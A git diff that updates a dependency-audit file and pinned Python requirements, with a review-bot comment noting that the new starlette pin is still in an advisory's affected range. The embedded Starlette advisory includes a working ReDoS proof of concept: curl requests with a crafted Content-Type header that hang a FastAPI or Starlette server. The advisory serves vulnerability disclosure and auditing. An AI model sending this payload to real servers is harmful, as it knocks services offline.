**directly accessible** or exposed behind proxies relaying malformed input: the unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8074/files", + "aliases": [ + "CVE-2024-24762", + "GHSA-qf9m-vfgh-m389" + ] + } + ] + }, + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "theharvester-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. 
This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. 
To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep 
uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", "affected": [ { "package": { "ecosystem": "PyPI", - "name": "aiohttp", - "purl": "pkg:pypi/aiohttp" + "name": "starlette", + "purl": "pkg:pypi/starlette" }, "ranges": [ { 
@@ -254,316 +318,207 @@ "introduced": "0" }, { - "fixed": "3.9.2" + "fixed": "0.36.2" } ] } ], "versions": [ - "0.1", + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", "0.10.0", "0.10.1", "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", "0.13.0", "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", "0.14.0", "0.14.1", "0.14.2", - "0.14.3", - "0.14.4", "0.15.0", - "0.15.1", - "0.15.2", - "0.15.3", "0.16.0", - "0.16.1", - "0.16.2", - "0.16.3", - "0.16.4", - "0.16.5", - "0.16.6", "0.17.0", "0.17.1", - "0.17.2", - "0.17.3", - "0.17.4", "0.18.0", - "0.18.1", - "0.18.2", - "0.18.3", - "0.18.4", "0.19.0", - "0.2", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", "0.20.0", "0.20.1", "0.20.2", + "0.20.3", + "0.20.4", "0.21.0", - "0.21.1", - "0.21.2", - "0.21.4", - "0.21.5", - "0.21.6", "0.22.0", - "0.22.0a0", - "0.22.0b0", - "0.22.0b1", - "0.22.0b2", - "0.22.0b3", - "0.22.0b4", - "0.22.0b5", - "0.22.0b6", - "0.22.1", - "0.22.2", - "0.22.3", - "0.22.4", - "0.22.5", - "0.3", - "0.4", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", "0.4.1", "0.4.2", - "0.4.3", - "0.4.4", "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", "0.6.0", "0.6.1", "0.6.2", "0.6.3", - "0.6.4", - 
"0.6.5", "0.7.0", "0.7.1", "0.7.2", "0.7.3", + "0.7.4", "0.8.0", "0.8.1", "0.8.2", "0.8.3", "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", "0.9.0", "0.9.1", + "0.9.10", + "0.9.11", "0.9.2", "0.9.3", - "1.0.0", - "1.0.1", - "1.0.2", - "1.0.3", - "1.0.5", - "1.1.0", - "1.1.1", - "1.1.2", - "1.1.3", - "1.1.4", - "1.1.5", - "1.1.6", - "1.2.0", - "1.3.0", - "1.3.1", - "1.3.2", - "1.3.3", - "1.3.4", - "1.3.5", - "2.0.0", - "2.0.0rc1", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.1.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.2.5", - "2.3.0", - "2.3.0a1", - "2.3.0a2", - "2.3.0a3", - "2.3.0a4", - "2.3.1", - "2.3.10", - "2.3.1a1", - "2.3.2", - "2.3.2b2", - "2.3.2b3", - "2.3.3", - "2.3.4", - "2.3.5", - "2.3.6", - "2.3.7", - "2.3.8", - "2.3.9", - "3.0.0", - "3.0.0b0", - "3.0.0b1", - "3.0.0b2", - "3.0.0b3", - "3.0.0b4", - "3.0.1", - "3.0.2", - "3.0.3", - "3.0.4", - "3.0.5", - "3.0.6", - "3.0.7", - "3.0.8", - "3.0.9", - "3.1.0", - "3.1.1", - "3.1.2", - "3.1.3", - "3.2.0", - "3.2.1", - "3.3.0", - "3.3.0a0", - "3.3.1", - "3.3.2", - "3.3.2a0", - "3.4.0", - "3.4.0a0", - "3.4.0a3", - "3.4.0b1", - "3.4.0b2", - "3.4.1", - "3.4.2", - "3.4.3", - "3.4.4", - "3.5.0", - "3.5.0a1", - "3.5.0b1", - "3.5.0b2", - "3.5.0b3", - "3.5.1", - "3.5.2", - "3.5.3", - "3.5.4", - "3.6.0", - "3.6.0a0", - "3.6.0a1", - "3.6.0a11", - "3.6.0a12", - "3.6.0a2", - "3.6.0a3", - "3.6.0a4", - "3.6.0a5", - "3.6.0a6", - "3.6.0a7", - "3.6.0a8", - "3.6.0a9", - "3.6.0b0", - "3.6.1", - "3.6.1b3", - "3.6.1b4", - "3.6.2", - "3.6.2a0", - "3.6.2a1", - "3.6.2a2", - "3.6.3", - "3.7.0", - "3.7.0b0", - "3.7.0b1", - "3.7.1", - "3.7.2", - "3.7.3", - "3.7.4", - "3.7.4.post0", - "3.8.0", - "3.8.0a7", - "3.8.0b0", - "3.8.1", - "3.8.2", - "3.8.3", - "3.8.4", - "3.8.5", - "3.8.6", - "3.9.0", - "3.9.0b0", - "3.9.0b1", - "3.9.0rc0", - "3.9.1" + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" ], "database_specific": { - "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json" + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" } } ], "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2" + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" }, { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-gfw2-4jvh-wgfg" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23829" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/3235" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8074" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8074/files" + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" }, { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827" + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" }, { "type": "PACKAGE", - "url": "https://github.com/aio-libs/aiohttp" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + "url": "https://github.com/encode/starlette" } ], "database_specific": { "cwe_ids": [ - "CWE-444" + "CWE-400" ], "github_reviewed": true, - "github_reviewed_at": "2024-01-29T22:30:07Z", - "nvd_published_at": "2024-01-29T23:15:08Z", - "severity": "MODERATE" + 
"github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" } } ], "groups": [ { "ids": [ - "GHSA-5h86-8mv2-jq9f" - ], - "aliases": [ - "CVE-2024-23334", - "GHSA-5h86-8mv2-jq9f" - ] - }, - { - "ids": [ - "GHSA-8qpw-xqxj-h4r2" + "GHSA-93gm-qmq6-w238" ], "aliases": [ - "CVE-2024-23829", - "GHSA-8qpw-xqxj-h4r2" + "GHSA-93gm-qmq6-w238" ] } ] diff --git a/requirements/awslogs-requirements.txt b/requirements/awslogs-requirements.txt index ca0fec15..9cfd40da 100644 --- a/requirements/awslogs-requirements.txt +++ b/requirements/awslogs-requirements.txt @@ -1,7 +1,7 @@ -boto3==1.28.65 -botocore==1.31.65 +boto3==1.34.34 +botocore==1.34.34 jmespath==0.10.0 python-dateutil==2.8.2 -s3transfer==0.7.0 -termcolor==2.3.0 +s3transfer==0.10.0 +termcolor==2.4.0 urllib3==2.0.7 diff --git a/requirements/azure-cli-requirements.txt b/requirements/azure-cli-requirements.txt index 2351ef01..f687f017 100644 --- a/requirements/azure-cli-requirements.txt +++ b/requirements/azure-cli-requirements.txt @@ -17,7 +17,6 @@ azure-keyvault-administration==4.4.0b2 azure-keyvault-certificates==4.7.0 azure-keyvault-keys==4.9.0b3 azure-keyvault-secrets==4.7.0 -azure-loganalytics==0.1.0 azure-mgmt-advisor==9.0.0 azure-mgmt-apimanagement==4.0.0 azure-mgmt-appconfiguration==3.0.0 @@ -33,7 +32,7 @@ azure-mgmt-cognitiveservices==13.5.0 azure-mgmt-compute==30.4.0 azure-mgmt-containerinstance==10.1.0 azure-mgmt-containerregistry==10.1.0 -azure-mgmt-containerservice==28.0.0 +azure-mgmt-containerservice==29.0.0 azure-mgmt-core==1.3.2 azure-mgmt-cosmosdb==9.4.0 azure-mgmt-databoxedge==1.0.0 @@ -46,7 +45,7 @@ azure-mgmt-eventgrid==10.2.0b2 azure-mgmt-eventhub==10.1.0 azure-mgmt-extendedlocation==1.0.0b2 azure-mgmt-hdinsight==9.0.0 -azure-mgmt-imagebuilder==1.2.0 +azure-mgmt-imagebuilder==1.3.0 azure-mgmt-iotcentral==10.0.0b1 azure-mgmt-iothub==3.0.0 azure-mgmt-iothubprovisioningservices==1.1.0 
@@ -66,9 +65,9 @@ azure-mgmt-policyinsights==1.1.0b4 azure-mgmt-privatedns==1.0.0 azure-mgmt-rdbms==10.2.0b12 azure-mgmt-recoveryservices==2.5.0 -azure-mgmt-recoveryservicesbackup==7.0.0 +azure-mgmt-recoveryservicesbackup==8.0.0 azure-mgmt-redhatopenshift==1.4.0 -azure-mgmt-redis==14.2.0 +azure-mgmt-redis==14.3.0 azure-mgmt-resource==23.1.0b2 azure-mgmt-search==9.0.0 azure-mgmt-security==5.0.0 @@ -77,12 +76,13 @@ azure-mgmt-servicefabric==1.0.0 azure-mgmt-servicefabricmanagedclusters==1.0.0 azure-mgmt-servicelinker==1.2.0b1 azure-mgmt-signalr==2.0.0b1 -azure-mgmt-sql==4.0.0b13 +azure-mgmt-sql==4.0.0b15 azure-mgmt-sqlvirtualmachine==1.0.0b5 azure-mgmt-storage==21.1.0 azure-mgmt-synapse==2.1.0b5 azure-mgmt-trafficmanager==1.0.0 azure-mgmt-web==7.2.0 +azure-monitor-query==1.2.0 azure-multiapi-storage==1.2.0 azure-nspkg==3.0.2 azure-storage-common==1.4.2 @@ -97,17 +97,18 @@ chardet==5.2.0 charset-normalizer==3.3.2 colorama==0.4.6 cryptography==41.0.6 +decorator==5.1.1 distro==1.9.0 -fabric==2.4.0 +fabric==3.2.2 humanfriendly==10.0 idna==2.8 -invoke==1.2.0 +invoke==2.2.0 isodate==0.6.1 javaproperties==0.5.1 jmespath==0.9.5 jsondiff==2.0.0 knack==0.11.0 -msal==1.24.0b2 +msal==1.26.0 msal-extensions==1.0.0 msrest==0.7.1 msrestazure==0.6.4 diff --git a/requirements/conda-lock-requirements.txt b/requirements/conda-lock-requirements.txt index 53ffb7be..5625ae71 100644 --- a/requirements/conda-lock-requirements.txt +++ b/requirements/conda-lock-requirements.txt 
@@ -1,30 +1,30 @@ annotated-types==0.6.0 appdirs==1.4.4 -cachecontrol==0.13.1 +cachecontrol==0.14.0 cachy==0.3.0 charset-normalizer==3.3.2 click==8.1.7 click-default-group==1.2.4 clikit==0.6.2 crashtest==0.3.1 -ensureconda==1.4.3 +ensureconda==1.4.4 gitdb==4.0.11 gitpython==3.1.41 html5lib==1.1 idna==3.6 jinja2==3.1.3 -markupsafe==2.1.3 +markupsafe==2.1.5 msgpack==1.0.7 pastel==0.2.1 pkginfo==1.9.6 -pydantic==2.5.3 -pydantic-core==2.14.6 +pydantic==2.6.1 +pydantic-core==2.16.2 pylev==1.4.0 requests==2.31.0 ruamel-yaml==0.18.5 ruamel-yaml-clib==0.2.8 smmap==5.0.1 tomlkit==0.12.3 -toolz==0.12.0 +toolz==0.12.1 urllib3==1.26.18 webencodings==0.5.1 diff --git a/requirements/dolphie-requirements.txt b/requirements/dolphie-requirements.txt index 616715cb..6045dbf5 100644 --- a/requirements/dolphie-requirements.txt +++ b/requirements/dolphie-requirements.txt @@ -1,4 +1,4 @@ -linkify-it-py==2.0.2 +linkify-it-py==2.0.3 markdown-it-py==3.0.0 mdit-py-plugins==0.4.0 mdurl==0.1.2 @@ -6,6 +6,6 @@ myloginpath==0.0.4 plotext==5.2.8 pymysql==1.1.0 rich==13.7.0 -textual==0.47.1 +textual==0.48.2 textual-autocomplete==2.1.0b0 uc-micro-py==1.0.2 diff --git a/requirements/dxpy-requirements.txt b/requirements/dxpy-requirements.txt index b1693dcf..4fd8ba9c 100644 --- a/requirements/dxpy-requirements.txt +++ b/requirements/dxpy-requirements.txt @@ -1,2 +1,2 @@ -certifi==2023.11.17 +certifi==2024.2.2 urllib3==2.1.0 diff --git a/requirements/jupyterlab-requirements.txt b/requirements/jupyterlab-requirements.txt index 68280b0d..c081fa0f 100644 --- a/requirements/jupyterlab-requirements.txt +++ b/requirements/jupyterlab-requirements.txt @@ -13,8 +13,11 @@ debugpy==1.8.0 defusedxml==0.7.1 fastjsonschema==2.19.1 fqdn==1.5.1 +h11==0.14.0 hatch-jupyter-builder==0.8.3 hatch-nodejs-version==0.3.2 +httpcore==1.0.2 +httpx==0.26.0 ipykernel==6.29.0 isoduration==20.11.0 json5==0.9.14 
diff --git a/requirements/linode-cli-requirements.txt b/requirements/linode-cli-requirements.txt index ff10d381..6f136480 100644 --- a/requirements/linode-cli-requirements.txt +++ b/requirements/linode-cli-requirements.txt @@ -1,9 +1,9 @@ charset-normalizer==3.3.2 idna==3.6 -linode-metadata==0.1.0 +linode-metadata==0.2.0 markdown-it-py==3.0.0 mdurl==0.1.2 openapi3==1.8.2 requests==2.31.0 rich==13.7.0 -urllib3==2.1.0 +urllib3==2.2.0 diff --git a/requirements/theharvester-requirements.txt b/requirements/theharvester-requirements.txt index bcdc0d41..9bb5c20f 100644 --- a/requirements/theharvester-requirements.txt +++ b/requirements/theharvester-requirements.txt @@ -1,22 +1,22 @@ aiodns==3.1.1 aiofiles==23.2.1 -aiohttp==3.9.1 +aiohttp==3.9.3 aiomultiprocess==0.9.0 aiosignal==1.3.1 aiosqlite==0.19.0 annotated-types==0.6.0 -anyio==3.7.1 +anyio==4.2.0 appdirs==1.4.4 attrs==23.2.0 backoff==2.2.1 -beautifulsoup4==4.12.2 -censys==2.2.10 +beautifulsoup4==4.12.3 +censys==2.2.11 charset-normalizer==3.3.2 click-plugins==1.1.1 colorama==0.4.6 deprecated==1.2.14 -dnspython==2.4.2 -fastapi==0.105.0 +dnspython==2.5.0 +fastapi==0.109.0 frozenlist==1.4.1 idna==3.6 importlib-metadata==7.0.1 @@ -24,23 +24,23 @@ importlib-resources==6.1.1 limits==3.7.0 markdown-it-py==3.0.0 mdurl==0.1.2 -multidict==6.0.4 -netaddr==0.9.0 +multidict==6.0.5 +netaddr==0.10.1 pycares==4.4.0 -pydantic==2.5.3 -pydantic-core==2.14.6 +pydantic==2.6.1 +pydantic-core==2.16.2 pyee==8.2.2 pyppeteer==1.0.2 requests==2.31.0 -requests-file==1.5.1 +requests-file==2.0.0 retrying==1.3.4 rich==13.7.0 -setuptools==69.0.2 -shodan==1.30.1 +setuptools==69.0.3 +shodan==1.31.0 slowapi==0.1.8 sniffio==1.3.0 soupsieve==2.5 -starlette==0.27.0 +starlette==0.35.1 tldextract==5.1.1 tqdm==4.66.1 ujson==5.9.0 diff --git a/requirements/vpn-slice-requirements.txt b/requirements/vpn-slice-requirements.txt index 3f45ba6d..c753662f 100644 --- a/requirements/vpn-slice-requirements.txt +++ b/requirements/vpn-slice-requirements.txt 
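Review bot: The new pin `starlette==0.35.1` in the second theharvester hunk still falls inside the range the starlette advisory hunk earlier on this page records as affected (`"last_known_affected_version_range": "<= 0.36.1"`, GHSA-93gm-qmq6-w238, CWE-400, CVSS A:H), so this bump does not clear that finding. The advisory hunk's file header is not visible here, so I am inferring it belongs to theharvester's audit file from the starlette references it adds; if that is right, the pin should move to a starlette release newer than 0.36.1 as soon as `fastapi==0.109.0`'s own starlette constraint allows it, and the audit should be re-run against the result. Until then it would help to record the known-open advisory next to the pin, e.g. `starlette==0.35.1  # still within GHSA-93gm-qmq6-w238 affected range (<= 0.36.1)`, so the exposure is visible to anyone consuming this lock file.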
@@ -1,2 +1,2 @@ -dnspython==2.4.2 +dnspython==2.5.0 setproctitle==1.3.3